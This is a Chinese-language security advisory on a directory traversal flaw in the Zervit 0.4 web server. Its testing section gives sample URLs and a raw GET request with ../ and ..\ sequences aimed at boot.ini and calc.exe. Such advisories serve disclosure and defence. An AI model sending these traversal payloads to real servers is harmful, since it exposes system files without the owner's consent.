发布日期：2009-04-16
更新日期：2010-05-18

受影响系统：

Sebastian Fernandez Zervit 0.4

描述：

---

BUGTRAQ  ID: 34570

Zervit是一小巧方便的便携式Web服务器。

远程攻击者可以通过向Zervit服务器提交恶意HTTP请求执行目录遍历攻击，读取服务器上的本地文件。

<*来源：Dr_IDE
  
  链接：http://www.exploit-db.com/exploits/12582
        http://www.exploit-db.com/exploits/8666
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://[ webserver IP][:port]index.html?../../../../../boot.ini  
http://[ webserver IP][:port]index.html?..\..\..\..\..\boot.ini  
http://[ webserver IP][:port]calc.exe?../../../../windows/system32/calc.exe  
http://[ webserver IP][:port]calc.exe?..\..\..\..\windows\system32\calc.exe  
http://[site]/../../../../../../boot.ini  
GET /../../../../../boot.ini HTTP/1.1

http://www.packetstormsecurity.org/1005-exploits/zervit-traversal.txt

建议：

---

厂商补丁：

Sebastian Fernandez
-------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://zervit.sourceforge.net/

浏览次数：2144
严重程度：0（网友投票）